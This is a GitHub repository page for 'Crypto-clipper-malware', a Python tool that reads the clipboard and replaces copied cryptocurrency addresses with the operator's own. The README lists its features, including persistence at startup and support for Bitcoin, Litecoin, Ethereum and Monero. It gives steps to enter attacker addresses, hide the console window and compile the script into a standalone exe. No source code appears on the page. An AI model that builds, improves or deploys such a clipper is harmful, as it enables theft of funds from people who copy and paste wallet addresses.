Skip to content

ecstasy01/Crypto-clipper-malware

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 

Repository files navigation

Crypto-clipper-malware

Reads clipboard for crypto address and changes them

Features

  • Supports Bitcoin, Litecoin, Ethereum, Monero clipping
  • Auto adds to start up
  • Supports multiple addresses
  • Find closest match out of your list of addresses

How to use

  • Pip install all the requirements in the file
  • Edit main.py and enter all your crypto address

How to compile to exe

  • Pip install pyinstaller
  • Change main.py into main.pyw (This will hide the console)
  • CMD -> pyinstaller --onefile (filename.py)

About

Reads clipboard for crypto address and changes them

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages